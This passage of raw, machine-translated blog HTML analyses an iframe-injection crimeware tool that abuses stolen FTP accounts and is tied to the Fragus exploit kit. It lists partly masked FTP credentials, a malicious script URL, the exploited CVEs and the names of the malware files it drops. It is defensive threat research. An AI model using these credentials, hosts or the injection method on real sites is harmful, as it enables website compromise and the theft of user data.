tag.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Not Iframed  ( no iframedas ). Básicamente son las cuentas ftp vulneradas. En este caso se almacenan hasta el momento varias cuentas ftp:"&gt;Not Iframe&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Not Iframed  ( no iframedas ). Básicamente son las cuentas ftp vulneradas. En este caso se almacenan hasta el momento varias cuentas ftp:"&gt;. FTP accounts are basically violated. In this case, stored until several ftp accounts:&lt;/span&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt; &lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="ftp://distribs:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179"&gt;ftp://distribs:softXP @ 193.xxx.xxx.66&lt;/span&gt;&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="ftp://distribs:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179"&gt;&lt;br /&gt;ftp://distribs:softXP @ 193.xxx.xxx.66&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="ftp://distribs:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179"&gt;ftp://tools:softXP @ 193.xxx.xxx.66&lt;/span&gt;&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="ftp://distribs:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179"&gt;&lt;br /&gt;ftp://tools : softXP@193.xxx.xxx.66&lt;/span&gt;&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="ftp://distribs:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179"&gt;&lt;br /&gt;ftp://tools:softXP @ 193.xxx.xxx.66&lt;/span&gt;&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="ftp://distribs:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179"&gt;&lt;br /&gt;ftp://distribs:softXP @ 193.xxx.xxx.66&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="ftp://distribs:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179"&gt;ftp://NST:124 @ 80. xxx.xxx.179&lt;/span&gt;&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="ftp://distribs:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179"&gt;&lt;br /&gt;ftp://NST:124 @ 80.xxx.xxx.179&lt;/span&gt;&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="ftp://distribs:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179"&gt;&lt;br /&gt;ftp://NST:124 @ 80.xxx.xxx.179&lt;/span&gt;&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="ftp://distribs:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://tools:softXP@193.xxx.xxx.66 ftp://distribs:softXP@193.xxx.xxx.66 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179 ftp://NST:124@80.xxx.xxx.179"&gt;&lt;br /&gt;ftp://NST:124 @ 80.xxx.xxx.179&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Good accounts  ( cuentas buenas ). Permite establecer cuáles de las cuentas ftp vulneradas son útiles o continúan activas."&gt;Good accounts&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Good accounts  ( cuentas buenas ). Permite establecer cuáles de las cuentas ftp vulneradas son útiles o continúan activas."&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Good accounts  ( cuentas buenas ). Permite establecer cuáles de las cuentas ftp vulneradas son útiles o continúan activas."&gt;. Allows you to set which violated ftp accounts are useful or are still active.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Freehosts accounts  ( páginas alojadas en hosting gratuito ). Se listan todos los ftp vulnerados de los sitios web que se encuentran alojados en hosting gratuitos."&gt;Freehosts accounts&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Freehosts accounts  ( páginas alojadas en hosting gratuito ). Se listan todos los ftp vulnerados de los sitios web que se encuentran alojados en hosting gratuitos."&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Freehosts accounts  ( páginas alojadas en hosting gratuito ). Se listan todos los ftp vulnerados de los sitios web que se encuentran alojados en hosting gratuitos."&gt;. It lists all the ftp violated websites that are hosted on free hosting.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Unchecked accounts  ( cuentas no chequedas ). Cuentas que aún no se han revisado."&gt;Unchecked accounts&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Unchecked accounts  ( cuentas no chequedas ). Cuentas que aún no se han revisado."&gt;. Accounts that haven't yet been reviewed.&lt;/span&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt; &lt;div style="text-align: justify;"&gt;&lt;span style="display: inline;" title="Las siguientes capturas muestras dos de los ftp vulnerados. En cada uno de ellos se puede almacenar cualquier tipo de información (warez, cracks, material pornográfico, phishing, material de pedofilia, cualquier tipo de malware, etc.). La primera de ellas aloja software y la segunda es un mirror para descarga de distribuciones basadas en *NIX."&gt;The following screenshots show two of the ftp violated. In each of these can store any kind of information (warez, cracks, pornography, phishing, pedophile material, any type of malware). The first software houses and the second is a mirror to download * NIX based distributions.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SwBtf-hJyhI/AAAAAAAAB74/X9iH0L9zUK8/s1600-h/mipistus-tiframer-ftp1.png#googtrans%28es%7Cen%29"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 163px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SwBtf-hJyhI/AAAAAAAAB74/X9iH0L9zUK8/s400/mipistus-tiframer-ftp1.png" alt="" id="BLOGGER_PHOTO_ID_5404439948970019346" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SwBtk3ftPeI/AAAAAAAAB8A/j_XbgAkC5aU/s1600-h/mipistus-tiframer-ftp2.png#googtrans%28es%7Cen%29"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 184px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SwBtk3ftPeI/AAAAAAAAB8A/j_XbgAkC5aU/s400/mipistus-tiframer-ftp2.png" alt="" id="BLOGGER_PHOTO_ID_5404440032984251874" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="display: inline;" title="El módulo  Manager  es en sí mismo el panel que permite la administración de cada una de las categorías antes mencionadas, incluyendo la posibilidad de eliminar directamente el ftp del historial."&gt;Module&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="El módulo  Manager  es en sí mismo el panel que permite la administración de cada una de las categorías antes mencionadas, incluyendo la posibilidad de eliminar directamente el ftp del historial."&gt; Manager&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="El módulo  Manager  es en sí mismo el panel que permite la administración de cada una de las categorías antes mencionadas, incluyendo la posibilidad de eliminar directamente el ftp del historial."&gt; is itself a panel that allows the administration of each of the above categories, including the ability to directly remove the FTP record.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SwBuMu3hX8I/AAAAAAAAB8I/3_BYDd58Ns4/s1600-h/mipistus-tiframer-manager.png#googtrans%28es%7Cen%29"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 301px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SwBuMu3hX8I/AAAAAAAAB8I/3_BYDd58Ns4/s400/mipistus-tiframer-manager.png" alt="" id="BLOGGER_PHOTO_ID_5404440717862985666" border="0" /&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Hasta esta instancia, estos primeros módulos tienen que ver con todo lo relacionado a la gestión de las cuentas. Sin embargo, no termina con estos y los siguientes módulos son más agresivos."&gt;To this end, these first modules are concerned with everything related to the management of accounts. However, it doesn't end with these and the following modules are more aggressive.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Uno de ellos es el módulo  Iframes . Este permite configurar la estrategia de ataque a través de etiquetas iframe, ocultándola (como es habitual) en un script. En este caso, el script utilizado posee como información la url  http://flo4.cn/1.txt ."&gt;One is the form &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Uno de ellos es el módulo  Iframes . Este permite configurar la estrategia de ataque a través de etiquetas iframe, ocultándola (como es habitual) en un script. En este caso, el script utilizado posee como información la url  http://flo4.cn/1.txt ."&gt;Iframes&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Uno de ellos es el módulo  Iframes . Este permite configurar la estrategia de ataque a través de etiquetas iframe, ocultándola (como es habitual) en un script. En este caso, el script utilizado posee como información la url  http://flo4.cn/1.txt ."&gt;. This allows you to set the strategy of attack through iframe tags, hiding it (as usual) in a script. In this case, the script has used as the url information&lt;/span&gt;&lt;span style="display: inline;" title="Uno de ellos es el módulo  Iframes . Este permite configurar la estrategia de ataque a través de etiquetas iframe, ocultándola (como es habitual) en un script. En este caso, el script utilizado posee como información la url  http://flo4.cn/1.txt ."&gt; &lt;/span&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;&lt;span style="display: inline;" title="Uno de ellos es el módulo  Iframes . Este permite configurar la estrategia de ataque a través de etiquetas iframe, ocultándola (como es habitual) en un script. En este caso, el script utilizado posee como información la url  http://flo4.cn/1.txt ."&gt;http://flo4.cn/1.txt.&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Uno de ellos es el módulo  Iframes . Este permite configurar la estrategia de ataque a través de etiquetas iframe, ocultándola (como es habitual) en un script. En este caso, el script utilizado posee como información la url  http://flo4.cn/1.txt ."&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SwBuqHvPgbI/AAAAAAAAB8Q/UMDHAWxTCP8/s1600-h/mipistus-tiframer-accounts.png#googtrans%28es%7Cen%29"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 301px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SwBuqHvPgbI/AAAAAAAAB8Q/UMDHAWxTCP8/s400/mipistus-tiframer-accounts.png" alt="" id="BLOGGER_PHOTO_ID_5404441222755353010" border="0" /&gt;&lt;/a&gt;&lt;span style="display: inline;" title="A su vez, esta url contiene como referencia otra url, pero en este caso, contiene un bruto script que contiene varios  exploits  y descarga automática de malware."&gt;In turn, this url contains reference to another url, but in this case, contains a rough script that contains multiple &lt;/span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/10/automatizacion-en-la-creacion-de.html#googtrans%28es%7Cen%29"&gt;&lt;span&gt;&lt;span style="display: inline;" title="A su vez, esta url contiene como referencia otra url, pero en este caso, contiene un bruto script que contiene varios  exploits  y descarga automática de malware."&gt;exploits&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="A su vez, esta url contiene como referencia otra url, pero en este caso, contiene un bruto script que contiene varios  exploits  y descarga automática de malware."&gt; and malware automatically downloaded.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SwBu6N6BTQI/AAAAAAAAB8Y/ALBP4I9wKNE/s1600-h/mipistus-iframe.png#googtrans%28es%7Cen%29"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 33px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SwBu6N6BTQI/AAAAAAAAB8Y/ALBP4I9wKNE/s400/mipistus-iframe.png" alt="" id="BLOGGER_PHOTO_ID_5404441499289079042" border="0" /&gt;&lt;/a&gt;&lt;span style="display: inline;" title="En esta instancia, luego de intentar correr el exploit, se redirecciona al dominio  http://www.google.ru , que parecería manipula la devolución de las búsquedas."&gt;In this instance, after trying to run the exploit, it redirects the domain &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="En esta instancia, luego de intentar correr el exploit, se redirecciona al dominio  http://www.google.ru , que parecería manipula la devolución de las búsquedas."&gt;http://www.google.ru&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="En esta instancia, luego de intentar correr el exploit, se redirecciona al dominio  http://www.google.ru , que parecería manipula la devolución de las búsquedas."&gt;, &lt;/span&gt;&lt;span style="display: inline;" title="En esta instancia, luego de intentar correr el exploit, se redirecciona al dominio  http://www.google.ru , que parecería manipula la devolución de las búsquedas."&gt;which seems manipulates the return of the searches.&lt;/span&gt;&lt;span style="display: inline;" title="En esta instancia, luego de intentar correr el exploit, se redirecciona al dominio  http://www.google.ru , que parecería manipula la devolución de las búsquedas."&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Los exploits que posee son los siguientes:"&gt;Exploits that have are the following:&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="CVE-2009-0927  (Adobe getIcon)"&gt;CVE-2009-0927&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="CVE-2009-0927  (Adobe getIcon)"&gt; (Adobe getIcon)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2463#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="CVE-2008-2463  (Office Snapshot Viewer)"&gt;CVE-2008-2463&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="CVE-2008-2463  (Office Snapshot Viewer)"&gt; (Office Snapshot Viewer)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="CVE-2008-2992  (Adobe util.printf overflow)"&gt;CVE-2008-2992&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="CVE-2008-2992  (Adobe util.printf overflow)"&gt; (Adobe util.printf overflow)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-0015#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="CVE-2008-0015  (MsVidCtl Overflow)"&gt;CVE-2008-0015&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="CVE-2008-0015  (MsVidCtl Overflow)"&gt; (MsVidCtl Overflow)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="CVE-2007-5659  (Adobe Collab overflow)"&gt;CVE-2007-5659&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="CVE-2007-5659  (Adobe Collab overflow)"&gt; (Adobe Collab overflow)&lt;/span&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt; &lt;span style="display: inline;" title="Los códigos maliciosos que se descargan son:"&gt;Malicious code that are downloaded are:&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/1afa5c94d66c7f6ee8e19617e9be9e5a3ef22840df61a613a75e4dba7c50af49-1258302523#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="ehkruz1.exe . Se trata de un troyano diseñado para capturar la información relacionada al servicio WebMoney y hasta la fecha posee un bajo índice de detección, detectándolo sólo 6 motores antivirus de 41. El nombre del archivo es aleatorio."&gt;ehkruz1.exe&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="display: inline;" title="ehkruz1.exe . Se trata de un troyano diseñado para capturar la información relacionada al servicio WebMoney y hasta la fecha posee un bajo índice de detección, detectándolo sólo 6 motores antivirus de 41. El nombre del archivo es aleatorio."&gt;. This is a Trojan designed to capture information related to the service WebMoney and to date has a low rate of detection, antivirus detected only 6 engines of 41. The filename is random.&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="ehkruz1.exe . Se trata de un troyano diseñado para capturar la información relacionada al servicio WebMoney y hasta la fecha posee un bajo índice de detección, detectándolo sólo 6 motores antivirus de 41. El nombre del archivo es aleatorio."&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/f193746a7a0179b425bf1895546ed56597211b5048c091ba5d18e0a5319107e5-1258312237#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="egiz.pdf . Contiene exploit (CVE-2007-5659, CVE-2008-2992 y CVE-2009-0927) con una tasa de detección baja, 7/41 (17.08%). Descarga el binario."&gt;egiz.pdf&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="display: inline;" title="egiz.pdf . Contiene exploit (CVE-2007-5659, CVE-2008-2992 y CVE-2009-0927) con una tasa de detección baja, 7/41 (17.08%). Descarga el binario."&gt;. Contains exploit (CVE-2007-5659, CVE-2008-2992 and CVE-2009-0927) with a low detection rate, 7 / 41 (17.08%). Download the binary.&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="egiz.pdf . Contiene exploit (CVE-2007-5659, CVE-2008-2992 y CVE-2009-0927) con una tasa de detección baja, 7/41 (17.08%). Descarga el binario."&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/7ac4dc0c107be71108aed279a8733c337907f5d95b02ee20cedaa1f2f735e16c-1258311524#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="manual.swf . Contiene exploit. Su tasa de detección es media-baja, 15/41 (36.59%)."&gt;manual.swf&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="display: inline;" title="manual.swf . Contiene exploit. Su tasa de detección es media-baja, 15/41 (36.59%)."&gt;. Contains exploit. Its detection rate is medium-low, 15/41 (36.59%).&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="manual.swf . Contiene exploit. Su tasa de detección es media-baja, 15/41 (36.59%)."&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/eb4f3bd460824c701f3a99463a16e4307f5a4c111f1dc610d26db82d6436f842-1258258779#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="sdfg.jar . Es un troyan downloader con exploit. Su tasa de detección es meda-baja, 14/41 (34.15%)."&gt;sdfg.jar&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="display: inline;" title="sdfg.jar . Es un troyan downloader con exploit. Su tasa de detección es meda-baja, 14/41 (34.15%)."&gt;. Troyan is a downloader with exploit. Its detection rate is meda-low, 14/41 (34.15%).&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="sdfg.jar . Es un troyan downloader con exploit. Su tasa de detección es meda-baja, 14/41 (34.15%)."&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/f8ccc2d4f0ec6be6ff370f8fcbf81ab217a2fcbe4673c8c21fd49d187d17042a-1258303885#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="ghknpxds.jpg . Contiene un exploit. Su tasa de detección es muy baja, 4/41 (9.76%)."&gt;ghknpxds.jpg&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="display: inline;" title="ghknpxds.jpg . Contiene un exploit. Su tasa de detección es muy baja, 4/41 (9.76%)."&gt;. It contains an exploit. Its detection rate is very low, 4 / 41 (9.76%).&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline; color: rgb(0, 0, 0);" title="ghknpxds.jpg . Contiene un exploit. Su tasa de detección es muy baja, 4/41 (9.76%)."&gt;&lt;/span&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt; &lt;div style="text-align: justify;"&gt;&lt;span style="display: inline;" title="El módulo  Injector  se encarga de las acciones de inyección del código iframe creado a través del módulo anterior, permitiendo configurar una serie de parámetros para optimizar el ataque; por ejemplo, permite controlar el PageRank, inyectar el código, limpiarlo en caso de ser necesario, chequear el país del hosting y las cuentas ftp, establecer qué dominios atacar (1º y 2º nivel, ambos configurables), configurar expresiones regulares con los nombres de carpetas y archivos más comunes de encontrar en un servidor web, entre otras."&gt;The module&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="El módulo  Injector  se encarga de las acciones de inyección del código iframe creado a través del módulo anterior, permitiendo configurar una serie de parámetros para optimizar el ataque; por ejemplo, permite controlar el PageRank, inyectar el código, limpiarlo en caso de ser necesario, chequear el país del hosting y las cuentas ftp, establecer qué dominios atacar (1º y 2º nivel, ambos configurables), configurar expresiones regulares con los nombres de carpetas y archivos más comunes de encontrar en un servidor web, entre otras."&gt; Injector&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="El módulo  Injector  se encarga de las acciones de inyección del código iframe creado a través del módulo anterior, permitiendo configurar una serie de parámetros para optimizar el ataque; por ejemplo, permite controlar el PageRank, inyectar el código, limpiarlo en caso de ser necesario, chequear el país del hosting y las cuentas ftp, establecer qué dominios atacar (1º y 2º nivel, ambos configurables), configurar expresiones regulares con los nombres de carpetas y archivos más comunes de encontrar en un servidor web, entre otras."&gt; is responsible for the actions iframe code injection through the module created earlier, letting you configure a number of parameters to optimize attack, for example, allows you to control PageRank, inject code, clean it if necessary, check the country's hosting and ftp accounts, establish which domains attack (1st and 2nd level, both configurable), configure regular expressions with the names of folders and files common to find in a web server, among others.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Ppq0fEGkHo4/SwBvjLP-DuI/AAAAAAAAB8g/zpdqqTUD54Y/s1600-h/mipistus-tiframer-injector.png#googtrans%28es%7Cen%29"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 301px;" src="http://1.bp.blogspot.com/_Ppq0fEGkHo4/SwBvjLP-DuI/AAAAAAAAB8g/zpdqqTUD54Y/s400/mipistus-tiframer-injector.png" alt="" id="BLOGGER_PHOTO_ID_5404442202950471394" border="0" /&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Investigando un poco más los dominios involucrados, salta a la vista que esta aplicación esta siendo utilizada como herramienta de &amp;quot;apoyo&amp;quot; por un conocido  crimeware , y del cual ya hemos hablado en este blog, se trata de la última versión de  Fragus ."&gt;Investigating a little more domains involved, obvious that this application is being used as a tool of "support" for a known &lt;/span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/los-precios-del-crimeware-ruso-parte-2.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="Investigando un poco más los dominios involucrados, salta a la vista que esta aplicación esta siendo utilizada como herramienta de &amp;quot;apoyo&amp;quot; por un conocido  crimeware , y del cual ya hemos hablado en este blog, se trata de la última versión de  Fragus ."&gt;crimeware&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Investigando un poco más los dominios involucrados, salta a la vista que esta aplicación esta siendo utilizada como herramienta de &amp;quot;apoyo&amp;quot; por un conocido  crimeware , y del cual ya hemos hablado en este blog, se trata de la última versión de  Fragus ."&gt; and of which we have spoken on this blog, this is the latest &lt;/span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/fragus-nueva-botnet-framework-in-wild.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="Investigando un poco más los dominios involucrados, salta a la vista que esta aplicación esta siendo utilizada como herramienta de &amp;quot;apoyo&amp;quot; por un conocido  crimeware , y del cual ya hemos hablado en este blog, se trata de la última versión de  Fragus ."&gt;Fragus.&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Investigando un poco más los dominios involucrados, salta a la vista que esta aplicación esta siendo utilizada como herramienta de &amp;quot;apoyo&amp;quot; por un conocido  crimeware , y del cual ya hemos hablado en este blog, se trata de la última versión de  Fragus ."&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Es decir, el dominio &amp;quot;escondido&amp;quot; entre las etiquetas iframe redirige 